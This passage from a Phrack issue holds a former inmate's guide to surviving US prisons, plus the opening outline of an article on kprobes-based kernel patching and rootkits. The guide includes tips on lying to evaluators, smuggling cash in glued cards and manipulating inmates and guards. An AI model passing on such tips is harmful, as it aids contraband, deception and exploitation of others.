65 entitled "the underground myth". It's so true, there are hardly any   
mentors out there that are actually reliable. Most are on some skiddie  
forum, and all they talk about is step by step SQL injections. And 
outdated RFI's.

    [ Yes. Step by step is annoying. ]

Due to this sickness infecting the web, we decided to write and 
publish this (for free of course). In the hopes that it will steer the   
newbies of the world away from GUI land, and back to our roots.

The book is 47 pages from start to finish. I believe that the  
information contained in said book is invaluable and would help a lot   
of people out.

    [ Invaluable? :) ]

I have been intrigued by almost every single issue of phrack. I know
typically Phrack puts up high level articles, but I have noticed that   
on occasion you guys will put something out there for the newbies, I
believe that this would be a very good addition to your awesome, and
inspiring publications. 

Thank you for your time and consideration of our book.  

NICKNAME

-EOF

    [ No problem Sam. Oh yes sometimes with PDF metadata you have that 
      kind of unfortunate leak ;> It would be wise to update your book :) ]


|--=[ EOF ]=-------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x05 of 0x10

|=-----------------------------------------------------------------------=|
|=---------------------=[ How to make it in Prison ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=----------------=[ by TAp - kill4deth <at> yahoo.com ]=----------------=|
|=--------=[ http://www.freewebs.com/hexdeth  / AIM : swp2388 ]=---------=|
|=-----------------------------------------------------------------------=|


                                  -------


  1 - Introduction
  
  2 - The beginning

    2.1 - Intake
    2.2 - Outline of the process

  3 - Fresh Meat

  4 - Life in prison 

    4.1 - What to expect and getting used to it
    4.2 - Mail & collect calls
    4.3 - Hygiene
    4.4 - How you will live and getting used to it
    4.5 - The commissary/snack cart
    4.6 - Making money

  5 - Interaction with other inmates

    5.1 - Getting checked
    5.2 - Just like momma used to make?
    5.3 - Getting punked/becoming a bitch

  6 - Prison gangs

    6.1 - Prison gangs
    6.2 - Should I join a gang, and if so which one should I join ?

  7 - County Jail Vs. State Prison
  
  8 - Common Situations

  9 - Staying mentally fit

  10 - Why I wrote this


                                  -------                                         



--[ 1 - Introduction


Alright people, this is a guide on what to do and how to act if you find 
yourself in a prison environment. Let's all face it, if you're into the 
underground world of hacking or phreaking then you've a very good chance 
of being arrested some day. Seeing as how I've been in this situation 
before, and also having noticed the amount of files on laws and police, 
I've decided to write a file that has information you could use to make 
your time a lot easier if you happen to go into prison. I myself seriously 
hope you would never have to use this in a real life situation but if you 
do, use it to your advantage. So to the point... 

In this file we will be talking about a lot of different techniques and 
also about things you should and should not do... This is in no way an 
exactly fool proof text. All information is based on how I, the author, 
interpreted the actions of others. Also note that this file is based 
solely on the American prison systems. Therefore if you are reading this 
file and are not living in America, some given information will be wrong 
and some steps of the process may not be in order or even exist at all.


--[ 2 - The beginning


OK due to the aspects of confusion, there will be some vocabulary that's 
common to the American Prison facilities in this file. In America there are 
thousands of 'slang' words that prisoners use to help hide or mask the 
activities from other inmates and/or the prison officials. We'll start at 
the beginning stage called the 'intake process'.


--[ 2.1 - Intake            
                         

The 'intake' part of the process is the very first part. In this process 
you will most likely have your constitutional rights (if you're American) 
read to you and if they fail to do this then you will most likely have all 
charges dropped/cleared. After this is done, you will be formally charged 
with what ever crime you are being accused of, then you will have your 
fingerprints and a mug shot (picture) of you taken. You will be moved into
a room either with other 'offenders/inmates' (these are the people who have
also committed crimes and awaiting trial) or by yourself depending on how 
many people are being 'processed'. In this room there will be guards there
to take pictures of any and all tattoos and scars. These will be used to 
help identify you in case you escape or try to give a fake identification 
in the future.

In this part of the process you will be completely naked, so if you're 
scared to show your body then too bad get over it or risk being restrained 
and having them undress you. Next you will take showers with (pubic) lice 
shampoo. Depending on the setup of the building you will either get to 
shower by yourself or with a group of inmates. After the shower you will be
given a set of pants and a shirt. Some prisons do not provide underwear or 
cotton shirts; you will have to buy these if they are available. Next you 
will be taken to your 'holding cell', a temporary housing until they either 
issue you a more permanent cell or until they get more room for you. Now 
you are ready for the main part of this text file.


--[ 2.2 - Outline of the process


This part is mainly about the movements that go on and what to expect while
in transition. Some of the information applies to the American judicial 
system.


--[ 2.2.1 - The county jail


When you first get locked up they will most likely put you in what is 
called a 'county jail'. This type of jail is only for the people who live 
in your general vicinity and is the first part of the process. While you 
are here you will either buy a lawyer or be appointed one. If you are 
appointed one you have a greater chance of going to prison. I would advise 
that you pay for one. While here you will see your lawyer and he will set 
up the pre-trial date. At the pre-trial your lawyer will present motions on
your behalf (These will help you in your case so don't just sit around in 
there. Go to the law library and do some research.) but the prosecutor will
also have the opportunity to present motions that can hurt your case. From 
here the judge will decide what to accept and what is thrown out, he will 
also set your real trial date.


--[ 2.2.2 - The first day in prison


Your first day in prison will be at a diagnostics unit. This is where they 
do mental evaluations on all inmates to help them place you in the facility
to best fit your needs; for example, if you are handicapped then you will 
be placed with fellow peers. If you are a person who likes to get angry and
assault people then you will go to a place with idiots such as yourself.

During your stay at the diagnostics unit you will go through tests 
regarding your mental stability and be questioned about your past. You will
also be asked about prior drug use. My advice to you would be to try to look
and act as normal as possible and to lie about any and all drug problems.
This will help make your time easier and keep you from doing stuff required
by the prisons to make parole such as a rehab/anger management program. 

After about 2 months, depending on your actions you will be sent to a more 
permanent placement which is a lot different. That is because most people 
were 'faking it to make it'. This means to act one way to get what you 
want. These people may have anger problems and all that but they pretended 
not to so they would get a better unit. Now once they get to that unit they
can go on to being their real selves. This can be frustrating to the people 
who are actually normal because now they have to put up with the people who
they didn't want to be around.

Note: You will notice that the guards on the transportation busses have 
shotguns. These are not for show; if you attempt to escape they will shoot 
to kill.


--[ 3 - Fresh Meat


Fresh Meat - This is someone who has never been locked up, therefore you 
are the main person people will 'go after' which means attempt to cause you
harm or to manipulate you. Most likely these people will be the ones who 
have been locked up for several years or the people who make a habit out of
getting locked up. Yes some people spend most of their pathetic life in 
prison, even when they've had many chances given to them. 

Now you're either reading this for one of two reasons:
   1. You've never been locked up before,
   2. You've been locked up before and you want to see if this is a serious 
      file.

Well if you're reading this to find out whether I'm knowledgeable on this 
fact, then you might find something in here that could have or will help 
you in the future ;]. But if you're reading this file for the first reason 
then enjoy.

Now most of the time when someone new goes to prison he will be approached 
by fellow prisoners who will attempt to give him a 'heart check'. This is 
where the other prisoners get you to fight them. They do this to see if you 
are a good fighter or if you will simply let them assault you. Most of the
time the people trying to assault will be the same race as you and they may
ask you some questions to see if they can find out more information on you.
If they do this, you must fight them back. It doesn't matter whether you 
win or lose, remember they are there to see if you have heart (courage). 
For them, people who fight to protect themselves or their property have 
'heart' and in prison respect is all you have. No one can take it unless 
you let them (and they will try).


--[ 4 - Life in prison


--[ 4.1 - What to expect and getting used to it


Now when you get to your facility please do not expect people to care if 
you want to go home, when you're used to eating, what you like to eat, or if 
your bed is too thin and hard on your back... NO ONE GIVES A FUCK, not the 
inmates, not the guards, and not the nurse.
                                                                        
You will most likely eat breakfast early in the morning. Here (America, 
Texas) it is at 3:00am then lunch is at 9:00am and dinner at 4-5pm. Do not 
expect a snack in between because there will not be any, not even if you're
"Starving to death". Yes this is your first time being locked up and most 
likely you will be a short timer (someone with less than 5 years, some 
people refer to short timers as 'having less than 20 years'...). Yes you 
will be there with people who have life without parole. Therefore you 
should not complain about how much time you have or how you want to go home
because this can cause problems with the other inmates who have been in 
prison for a while and most likely will not be getting out soon. Inmates 
with a lot of time take this so seriously they will fight you if they hear 
you complain about your situation. Remember, there will always be people 
with more problems than you.


--[ 4.2 - Mail & collect calls                          


You will most likely have the right to send/receive letters from family and 
friends. There will most likely be limits on the amount you can send out 
for a certain amount of time depending on where you live. You may also be 
expected to provide the pen/paper/envelopes/stamps. 

There may also be payphones (good luck to all the phreakers) depending on 
your location. If you are lucky enough to be in a prison with working 
phones you may notice that you will have to place collect calls. However 
this type of call will not establish a connection with a cellphone unless 
the receiving party has set up an account with the phone company. 

Also not all land lines will accept a collect call. Depending on the phone 
company the prison uses you may be able to set up a prepaid account that 
your family will provide money to. If you are using this type of account 
with the phone company then you will be able to call any land-line/
cellphone.

Now that you know the basics about the mail/phone set up we're going to 
talk about what you should not do regarding these systems. If for some 
reason you are not receiving your mail, make sure you are not giving it to 
the guard who may have reason to not turn it into the mail office/postal 
services. They may work for the prisons but there are some who are just as 
corrupt as your fellow prisoners. If you are certain this is not happening 
then there may be a problem with the postal services, sadly you will not be
able to find this out. Lastly and most likely your loved ones just simply 
did not write you back. There is really only one main reason that you can 
not get through on your phone calls and that would be the person you are 
calling does not want to talk to you. If this is so, do not complain to 
your fellow inmates; they do not care, like I said before. The reason I tell 
you this is because there are some people who do not receive letters/calls 
and it's simply rude to complain in front of these people (it's also bad for
your health).

Another thing is that there are some people who will try to manipulate you 
into giving them a phone call or try to get you to give them your pin #. 
You'll know what I mean and be able to resist this if you have some 
experience in social engineering. Your best bet would be to keep your pin #
for yourself and if you give someone a phone call make them give you 
something of theirs. Also you can use your knowledge of SE to exploit your 
fellow inmates to make your free calls, once again good luck with your 
techniques :)

Note: Phone calls and mails will be monitored by the prison officials so be
careful of what you say.


--[ 4.3 - Hygiene  


Right if you really need me to explain this to you then there's something 
wrong, but to all the people who need it...

Depending on your location you may or may not be given hygiene (deodorant /
soap / shampoo ... you know the main shit). If this is not given to
you then you will need to find a way to get these items because you don't 
want to walk around looking/smelling like a homeless bum because this seems
to upset the inmates and also the average person; no one wants to smell you. I 
would also recommend that you take a shower as often as you can. In some 
prisons you may only shower once a week, maybe longer, this is why the 
deodorant is so important because it will help make you smell better or 
'seem cleaner'.


--[ 4.4 - How you will live and getting used to it                                        


Now you're going to be in prison and you will be living there for the time 
being. No one in their right minds will like living there and most of the 
time the guards don't even want to be there. Noting this you will be issued
a bed (this is not a real bed, it's more like a shower curtain stuffed with 
wall insulation). They're not very thick (most of the ones I've seen are 
about three inches thick) and as you might think they are not in the least 
bit comfortable. No one is going to care if your back hurts or you can't 
sleep, you will just have to get used to it. You will not be issued 
sleeping medication or pain relievers, due to the illegal pill trade inside
the prisons. In your cell you may or may not have a toilet. These will be 
stainless steel, you may have seen some in a prison movie, and most likely 
have a sink at the top. Don't worry the water does not recycle.

So if you are shy (note: you will also be present in front of female 
guards, this may cause you to be more uncomfortable than you already are 
unless you get amusement from shifting in front of them) then you're going 
to have to get over this quickly or walk around holding your piss and 
having a stomach full of shit. When you're done doing your bathroom 
business make sure you clean the area you've used (only the sink/toilet 
seat, the rest doesn't matter unless you're clumsy and pissed on the floor 
or dropped something). 

This is to show respect for yourself and the others around you so please be
sure to clean up after yourself. This type of cleanliness also applies to 
your room/cell/living area. You should observe good cleaning habits to make
sure your room is not a mess or does not smell bad. The main reason is that
if a guard sees a room that is in a mess then they're most likely to search
the room (these are called 'shake downs') and if you are the cause of these
shake downs then your fellow peers will 'check' you. 


--[ 4.5 - The commissary/snack cart


In prison there is a thing called commissary (it's like a store in prison).
With this you can buy food such as candy, chips, cokes and lots of other 
things that are way better than what they give you from the cafeteria. The 
problem is that you will have to buy these items with your own money. This 
will have to be sent to you from the outside world, basically your family /
friends will have to do this. You can't just come across some real money 
and hand it to them; they won't take it. They will tell you about the process
more when you get there. You are issued an account number and the money 
will be located there. You will also be able to buy your hygiene / letter 
writing materials here. Make sure you buy the things you need before you 
buy the things you want.

Note 1: people may try to manipulate you into buying items for them. Please
do not be easily manipulated; only buy things for the people you trust and 
make sure they pay you back or give you something in return for what you 
gave them.

Note 2: you may also try to SE people into buying stuff for you but be 
smart about this because people do not like when they find out you 
manipulated them.


--[ 4.6 - Making money
                                                     

Yes it is possible to make 'money'. The term money is not only used for 
legal currency but also commissary / tobacco / stamps / other materials. These
are worth the same amount as they are when you buy them from the commissary 
people and tobacco will be worth more if it is not sold by the commissary.
Now once you buy your materials you have either the choice to keep them or 
use them to buy illegal goods that are rampant inside the prisons across 
the world. There will always be someone who can be corrupted or extorted 
into doing your bidding (bringing in certain items you could not get 
without an outside source; this is called contraband). Now you'll use your 
legal goods to buy this contraband from the more experienced inmates, there
will be all kinds of contraband to choose from and they are not cheap. Here
is a nice list of a few things that may be available to you: 

1. Most drugs, i.e. cocaine, heroin, methamphetamine, crack, also 
including prescription pills obtained by the inmates who take the 
medications. They do this by hiding the pills in their throat or they can
be brought in by a guard or through visitation.

2. Real currency. This will be obtained through the usual ways like the 
guards, visitation, and using the mail. Either the guard didn't check the
mail right or it was hidden inside a card. People use birthday cards to 
hide the money. The process is quite simple. Take a card that has a part 
where you can write extra stuff on then put the money between that part and
the back part of the card. Super glue it in a neat and undetectable 
fashion.

3. Tobacco. There are the normal channels but remember also that the inmate 
you're buying this stuff from might have had this in their anal cavity to 
hide it while being searched. Lol that's why I never smoked unless I knew it 
wasn't stuck up an ass before.

4. Cell phones. These will be brought in by the guards 99% of the time and 
they will cost more than anything else you can buy. It has to be real 
currency (guards don't want food because they can get it themselves). They 
cost around 200 to 400 dollars and I've heard of people buying them for 
$1,000. It will be pre-paid and you should get a zip charger (about the 
size of a AA battery). Keep the phone on silent and only use it when you're
alone because if you are caught with a phone inside a prison you may be 
charged with another crime and sentenced to more time. When you run out of 
minutes you may have your family buy a refill card and activate it over the
Internet.

Note: Other inmates may ask to use your phone, charge them for this if you 
allow it.

My advice would be to hide it from everyone and not tell anybody since they
may try to use this against you and force you into doing something against 
your will. They'll threaten to tell on you or just do it to get back at you
for something.

Past events: The state of Texas has just recently cracked down on the 
illegal cell phone trade inside their prisons. They are currently 
installing cell phone jamming devices in all of their facilities, the 
reason for this is because an inmate on death row called a government 
official from his cell and threatened his family.

5. Tattoos/materials. You can also pay for getting some nice tattoos in 
prison, they are of high quality and cheaper than in the free world (not 
sure why though). You can just about get any type of tattoo you want as 
long as you're willing to pay for it. You can also sell the tattoo guns / 
ink if you know how to make it. The prices will be up to you and the basic 
rules of the prison environment.

6. Artwork. If you know how to draw you can draw up some samples and show 
them off and you will get some people who will want you to draw for them. 
Whether this is a card for their family or a tattoo design they plan on 
getting, the prices are up to you. The better the quality the higher the 
price you can request.

7. Weapons/shanks. These are home made knives that people will use to 
assault/kill others with. There are also tempered Styrofoam and newspaper 
bats/poles and spears made out of newspaper. These really have no set cost,
I just thought I'd give them a mention.

8. Other inmates. Yes there may be inmates for sale. These you can buy to do
your bidding or just simply to have someone under your control. You can 
basically do anything you want but my advice is to treat them nice and make
them think you're their friend or else they'll turn against you. Also be 
prepared to protect this person. If they see you're not helping them they 
are not going to help you. This may bring you more problems than what you 
want. The prices will be set by the person you're buying from. If you are 
caught buying/selling people you will be severely punished.

Note 1: These are all illegal products and most are punishable by law. You 
can receive extra time if you are caught buying/selling these items.

Note 2: You should really commit to using your SE skills with these 
activities to help you get more for less, just make sure not to get caught 
cheating people.


--[ 5 - Interaction with other inmates


--[ 5.1 - Getting checked 


Being 'checked' by someone is not a good thing at all. This means another 
inmate is telling you that you've fucked up or letting you know that you're
doing something wrong. A good example of being checked would be: 

You use the restroom and you forget to clean up after yourself. Another 
inmate that has been waiting for you to finish comes in and sees this. Now
he can't use the restroom until your mess is cleaned up but he's not going
to clean it himself. What he will do is go and find you and tell you to 'go
and clean your fucking mess up'. Now if you do clean it after the other 
inmate told you this in front of every one then you will be thought of as 
someone who can be pushed around and if you don't clean it you will have to
fight this inmate.

This is looked at as a bad thing because the other inmates may see this as 
you letting someone tell you what to do and then they'll try to do the 
same. The type of people who let the other inmates tell them what to 
do have the lowest rank in prison (right above snitches and sex offenders). 
I hope that none of you are sex offenders but if you are then you will get 
what you deserve when you get caught and this file will not help you in 
any way. So you should simply avoid this type of confrontation.

                                     
--[ 5.2 - Just like momma used to make?


In this section we'll be talking about the food you will be eating while 
you're locked up. This 'food' as they like to call it is not very good and 
you most likely won't be getting a lot of it (if you're the average man 
you're going to go to sleep hungry most nights). You'll start your day off
early in the morning (3:00am where I was at, this will mostly be true for 
you also because there will be a lot of people in the prison and they'll 
have to start early to get everything done on time). Then there will be 
lunch at about 9:00am to 11:00am and finally you'll have your last meal 
somewhere around 5:00pm. 

Now that you have the basic meal schedule it's time to tell you what you're
most likely going to be eating. The main thing I've seen would be the soy 
bean patties (tofu I guess). This is not real meat nor will it taste as 
such. The reasons they give you are:

   1. It's cheap,
   2. It's low in fat (they have to keep you healthy even though they'll 
      feed you the minimum amount of calories that a human needs to stay 
      alive),
   3. It's high in protein. 

If you are not given soy bean then you will be given either 'pork' or 
turkey meat (this will mostly be the 'sausage' at breakfast or the patties 
for the hamburgers). The breads will almost all the time be wheat (you may 
like wheat bread but it gets really old after a while). Basically 
everything will be low fat. I'll recommend that even if you don't like it 
just eat it (mixing the food all together will help mask the taste). 

Basically there may be things that you can't eat without throwing up. You 
will get used to it the more you eat it but there will always be 'roaches'
(someone who looks for scraps/extra food that others did not eat...like a 
cockroach). These people will see that you did not eat all your food and 
ask you if they might have it. Depending on who they are and if you trust
them or not, it is up to you whether you give it to them or not. I would 
suggest you not to if you don't know them or if you think they're trying 
to manipulate you. Giving people stuff they want will not help you gain 
acceptance. They will continue to manipulate you if you allow it.


--[ 5.3 - Getting punked/becoming a bitch

 
Getting 'punked' is when you allow other inmates to treat you any way they 
want. This includes:

   1. Letting them assault you
   2. Letting them take your food/personal belongings
   3. Letting them verbally abuse you
   4. and sexual abuse

Becoming a 'bitch' means that you belong to another inmate. You'll be 
treated like a punk and/or be raped though they may protect you in return 
(they can't let other inmates fuck with their property now can they?). Don't
let this happen, if you think this may happen to you then stop reading the 
file, you'll be a disgrace to all the hackers and phreakers of the world. 

Note 1: an inmate may offer you protection from the other inmates. What 
they will not tell you is that you will be their bitch, and will do what 
they say or accept the beating you will get. Also if one day you no longer 
want the protection of the inmate then he and his friends will target you. 
You will still get beaten, so don't accept any 'protection'.

Note 2: You may notice that I degrade a few types of people in this file 
such as sex offenders and 'bitches'. When I use this word I mean the people
who can defend themselves but simply will not. There are people who will 
not fight for themselves but if someone tells them to fight another person 
then they will. This is pathetic and inexcusable, do not be like this.


--[ 6 - Prison gangs


--[ 6.1 - Overview


I will now try to explain the basic concepts of the main types of prison 
gangs. Please remember this will not always be true for all gangs or for 
prisons in other countries besides the USA. Some information may not be 
accurate therefore I will not use any names.

When you go in prison you may notice that groups of people with the same 
types of tattoos happen to congregate in groups (most of the time in the 
same areas). You may also notice that they will show favoritism to the 
group they associate with, this is most likely because they are in a 
'gang'. A gang is a group of 3 or more people that are involved in 
organized crime and believe in the same values/beliefs and share the same 
goals. For this reason these prisons have established what most call a 
'gang task force'. People assigned to the task force are responsible for 
finding out the illegal activities of these inmates....

Most of the gangs are based on race (White/European, 
Mexican/Latino/Hispanic, Black/African). Their common goals are to: 

   1. Protect each other. Have your fellow members' backs; don't let anyone 
      walk over them or punk them. Most likely though there won't be any 
      punks in a gang (and if there are they will be ejected from the gang 
      or disciplined).

   2. Establish and keep the respect of their people. Once again don't
      allow people to push you around, if this is allowed then it will be 
      bad for their business/dealings.

   3. Make money. This has been explained to you already but what was not 
      explained earlier was that most of the people you will buy your 
      contraband from (drugs mainly) will be from one of these gangs. Gangs
      often go to war over business related dealings. Most people assume it's
      inspired by racial issues but about 90% of the time it's over the drug
      trade/territory.


--[ 6.2 - Should I join a gang, and if so which one should I join ?


My advice to you would be that you should not join a gang if you want to 
get out and go home on time. When you join a gang you are expected to put 
the gang and its members first. It doesn't matter if you think it's the 
right thing to do. If they ask you to do something then you must do it or 
accept the punishment they will give you. If another member is with you and
instigating problems with other people and he gets attacked, it will be 
your job to help him. This means you could end up getting hurt or getting 
more time on your sentence (think about this for a minute you have 4 days 
until you're allowed to go home and then something happens where you have 
to help your gang... You end up getting more time and can't go home. How 
would your family feel, how would you feel ?).

Now if you are persistent about joining one, here are the main rules about 
this:

   1. You should join a gang based on the same race/ethnic group as you 
      are. 
   2. Make sure you understand and are willing to follow any and all rules 
      given to you.
   3. Do not try to manipulate your fellow members or cheat the gang out of 
      any money.
   4. Only do approved business with other gangs/people.
   5. Do not talk about your gang affiliation with any one (family/guards).
   6. Make sure you are willing to be in the gang for the rest of your 
      life, your affiliation does not stop when you are released (if 
      released), you will be responsible for contacting your local ranking 
      members of the gang when you get out.
   7. Most importantly do not join a gang if you have anyone you love or 
      care for. The simple reason for me saying this is that you may not 
      get out if you join a gang... You must follow any and all orders 
      including if they want you to kill someone (people have been ordered 
      to kill their own family members).

Note: Failure to do these things may cost you your life. You will also have
more rules to follow than expected when you join. These rules aren't known 
to people outside the gang therefore I've only listed the most common.


--[ 7 - County Jail Vs. State Prison


What? There is a difference, you say? Yes, there are a few of them in fact. 
Let's go over them.

                            -------------------

                                County cons

   1. You most likely won't move out of your cell.
   2. Time is harder and feels like it goes by a lot slower.
   3. Depending on how big it is, there's not as much food.
   4. It might be a lot more dirty and could smell like shit and piss.
   5. You will be in there with mentally ill people.
   6. Commissary costs more.

                                County pros

   1. You may get to see females and depending on the jail write them 
      (they'll be locked up too).
   2. You may get to have your own shower.
   3. You may not have to get up if you don't want to.
   4. You may not have a lights out time.
   5. Not everything is gang related like prison and you can basically 
      chill with whoever you want (as far as race goes rivalries still 
      hold up).

                            -------------------

                                Prisons cons

   1. A lot of new rules you must learn and you might be expected to learn 
      without any help.
   2. The daily schedule will be a lot different than in county.
   3. Gang wars.
   4. Lock downs (no movement at all until told otherwise this can go on 
      for months).
   5. Work (you will have to work and you may not get paid for it... You 
      could work in the fields too and that sucks).
   6. Can't write other people who are also locked up (this means the girl 
      you wrote in county won't be getting your letter).
   7. Mass butt naked searches. 
   8. Take showers in front of every one.

                                Prisons pros

   1. Time goes by a lot faster than in county jail
   2. Easy to make money.
   3. Tattooing is more available.
   4. Cheaper commissary.
   5. Easier access to tobacco/drugs.
   6. A lot more respect than what there is in jail.


                            -------------------


--[ 8 - Common situations


Here we will talk about a few common (negative) situations presented to the
newer people of the prison world. In this section I'm going to tell you the
best ways to get out of them and I'll try to explain them in a way you can 
understand. Not all situations are listed in this section because no one 
can list them all but you can use what is here to help you 'free style' the
situation if one arises. Like I've said before you can use social 
engineering skills to help you get what you want or get out of almost 
anything that you can get yourself into. So let's get to it...

1. It's your first day on the unit (prison), people will be looking to see 
if they can make you their punk/bitch (remember that we've talked about 
this before). The most common way they will try this is using intimidation.
Most of the time a group of inmates will approach you and ask you seemingly
harmless questions but they're not. These questions can be used against 
you in some type of way (these people are not trying to be friendly, it may
seem this way but it's not). A few subjects you should not release any 
information about would be: 

  - Your family/personal life. Do not give your address or anything such as
    this out. The reason for this is to make it harder for them to know the
    people you may know.

  - Never lie about things you're not sure of. Just simply state that it's 
    your business and keep it as such. Also do not lie to try and gain 
    acceptance because it will not work. Keep your stories to yourself and 
    only tell them to trusted people.

2. You walk into the 'dayroom' (the place where everyone gathers to play 
games/watch tv/converse) and you see the people who entered your cell 
earlier playing a game of cards. You see that they are having a good amount
of fun and you need something to help take your mind off of your situation
or you just simply want to go over and make a few new friends. Well I'd 
recommend that you stay to yourself for a while longer and let the other 
inmates invite you to the game if they choose to do so. Still be cautious 
if they do as they might try to manipulate you for some reason.

Note: I'd also recommend that you do not just go up to people asking them 
questions or telling them your adventures from the free world. Being a 
friendly person is not looked at as a good thing while in prison.

The reason you should not just walk up to people and talk to them is
because some of them are mentally ill and may attack you if you attempt 
this. They will also try to make you think they are your friend and use you
for their amusement or personal gain. You should also never give out 
personal information to people you don't know because they may use that to 
help find victims when they are released. 

Note: If you want to make friends then my advice is to not lie to people; 
show them you're trustworthy. If you're not a drug dealer then don't say 
you are. If you've never shot a gun don't say you have. And also don't 
overload them with technical talk, and don't get all excited to be talking 
to someone. They are not that cool plus it's annoying.

3. Someone disrespects you, either verbally or physically (pushing you or 
bumping into you). When this happens your safest bet would be to fight and 
not let this go on for very long because you will be seen as a bitch. Now 
if you are challenged to a fight then you should accept it and fight as 
well as you can. It won't really matter if you win or lose. If the inmates 
see you will fight then they will respect you.

Note: If a guard tells you to stop or hit the floor then you should do so 
to avoid being pepper sprayed or tased. Some prisons are allowed to use 
deadly force.

4. Your friends or some other people ask you to join a gang. This is up to 
you. For help refer back to the gang section of the article.

5. You see something happening that you don't like, then your best response 
would be no response. If you get into someone else's business then it will 
only cause problems for yourself and you do not need any problems that can 
be avoided. If you choose to take action then that will be on you, I have 
warned you of doing so.

Note: This could result in retaliation from other inmates as well.

6. You're about to get out and you no longer want to be in the gang you 
joined when you first got locked up. Well there's a problem with this 
because, one, you were told it was for life and, two, they will most likely put
a contract on you (hire someone to kill you). To avoid being killed inside 
the prison walls you can use a technique. In prison they have a program 
called 'PC' (protective custody); this is for people with mental/physical 
illnesses and for the weaker prisoners. You will use this to your 
advantage, here is a good way to put yourself on PC:
 
Contact a ranking guard and let him know your situation. You will want to 
do this with a guard you trust so that he will not tell everyone of what 
you are planning to do. Sooner or later you will be taken to a one man cell
and you will be asked questions by the gang task force. You will be asked 
to give any and all information about the gang and if you don't help them 
then they will not help you.

Note 1: In my opinion if you use this part of the file you do not deserve 
to call yourself a man.

Note 2: These are the most common situations you may go through in prison 
but these are not definite. You may need to customize these techniques or 
apply them to different situations...


--[ 9 - Staying mentally fit


In this part of the text we will be talking about the various techniques to
help you stay mentally fit. Basically what I'm talking about is how not to 
go crazy. Some people have the tendencies to over obsess about the outside 
world, or to think too much about their friends and family. This will cause
you to stress yourself out and become depressed. This leads to suicide in 
some people and this is what we want to avoid. So here are a few techniques
or suggestions that I'll give you to help keep you on top of things.

1. Some people put all their faith in getting letters and phone calls from 
their family/friends. This is not really a good thing. When you get a 
letter I would recommend reading it once and then replying to the letter as
soon as possible. Doing this will help you keep your mind off the free 
world. If you continually keep negative things on your mind/think about 
negative things then your attitude will almost always be negative. This is 
what we want to avoid inside the prison walls. The more negative you are, or
the more negativity you're around, the more likely you are to do negative things.
This will most likely cause you to stay inside prison longer than you have 
to.

2. Visitation is most likely going to be the hardest part to get out of 
your mind. The reason for this is because you actually get to be with the 
people you love. Now depending on where you are at, you may have to be 
separated by a wall with glass and will talk to them on a pay-phone type 
set-up. 

Note: Beware that most prisons record these types of conversations. You may
not get a prompt letting you know this but regardless be careful about what 
you say. A few tips on how to have a good visit from the family/friends: 

- Stay on a positive topic. You don't need to fight or argue with someone 
who takes the time to come and see you, and later on you'll most likely 
feel bad for doing this. This is what we don't want.

- Do not attempt to get your visitor to smuggle contraband. This can cause 
problems between you and the visitor, or you may end up getting them put in
prison if they do wish to bring the contraband.

- Take one visitation at a time. In other words do not go back to your cell
and ponder upon the visit. Doing so will cause you more stress and problems
than you should have to deal with.

3. You will be allowed to have pictures of your loved ones. This can be a 
good thing. Everyone wants to have pictures, but you should not keep them 
out because this causes you to pay more attention to the pictures instead 
of the things you really should be doing. You're just making your time 
harder than it should be by thinking about things that make you depressed.

Note: Also keeping your personal stuff out can end up getting it stolen by 
the other inmates. Stealing is frowned upon but is very common inside 
prisons.

4. When the guards tell you 'lights out' or bed time then this is what you 
should do. Do not stay up at night and ponder upon your misfortunes or your
family. The reason is this causes you to lose sleep and will make your 
daily schedule very hard to work with. You may be expected to work while 
you're locked up and if you're not fully functional then you will cause the
others to get angry and lash out against you.

5. Try to have as much fun as you can. This is hard but you have to try. 
Once you get comfortable and in transition to this new way of life then it 
will become easier. The main thing you should do to have fun is play games 
such as cards, dominoes. They may have a few board games also (I liked to 
play a good game of chess myself). Also when you're at the rec. yard (a 
place outside where you are allowed to roam inside a certain area) play 
some sports like basketball or football. There will be sports and people 
willing to play, this can also help you meet new people who can help 
distract you from your daily problems.

6. Like I mentioned earlier you can workout to keep you in shape and keep 
your mind off your problems. Find yourself a good workout routine and stick
with it. Working out is proven to raise your self-esteem and help with 
depression. You don't always have to wait until you go outside to workout, 
you can do this inside your cell whenever you find yourself thinking about 
negative things.

7. Establishing a relationship with a guard (depending on the sex the 
reader is) can also help you pass the time. If you have someone that is 
willing to help you in your time of need then this will bring your stress 
level to a lower term if not take it away completely.

Note: Establishing a relationship with a guard is not easy. They look at 
you like a criminal so your goal is to either manipulate them into 
believing that you're not or just simply show them the real you {nice, 
kindly person lol}. Like I've said this is a hard task but this in itself 
can keep your mind off the bullshit. Think of new ways to get through the 
guards' personal defenses (you're hackers, you should be good at this), and 
when you finally overcome them then you have all kinds of fun things to do 
depending on what your intentions are (contraband staff, or true 
relationship. Yes you may be able to fuck them). 


-[ 10 - Why I Wrote This


I wrote this article based on the assumption that many people would 
basically enjoy it, but also that it may help some people if they happen 
to go to prison. I was sentenced to 20 years for aggravated assault with a 
deadly weapon. It was my first time ever being locked up but I was one of 
the ones who took it as a challenge. While inside I've seen other first 
timers being treated in a way that no person should ever be treated. 

I made it inside the prison walls and now I am sharing with you ways for 
you to make it also. Use this to your advantage; this is for entertainment 
but also education.


                                          -TAp


PS: If you have any questions you would like for me to answer then please 
feel free to contact me.



--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x06 of 0x10

|=-----------------------------------------------------------------------=|
|=--------------=[ Kernel instrumentation using kprobes ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by ElfMaster ]=---------------------------=|
|=----------------------=[ elfmaster@phrack.org ]=-----------------------=|
|=-----------------------------------------------------------------------=|


1 - Introduction
	1.1 - Why write it?
	1.2 - About kprobes
	1.3 - Jprobe example
	1.4 - Kretprobe example & Return probe patching technique

2 - Kprobes implementation
	2.1 - Kprobe implementation
	2.2 - Jprobe implementation
	2.3 - File hiding with jprobes/kretprobes and modifying kernel .text
	2.4 - Kretprobe implementation
	2.5 - A quick stop into modifying read-only kernel segments
	2.6 - An idea for a kretprobe implementation for hackers

3 - Patch to unpatch W^X (mprotect/mmap restrictions)

4 - Notes on rootkit detection for kprobes

5 - Summing it all up.

6 - Greetz

7 - References and citations

8 - Code



---[ 1 - Introduction

----[ 1.1 - Why write it?

I will preface this by saying that kprobes can be used for anti-security
patching of the kernel. I would also like to point out that kprobes are not
the most efficient way to patch the kernel or write rootkits and backdoors
because they simply require more work -- extra innovation. 
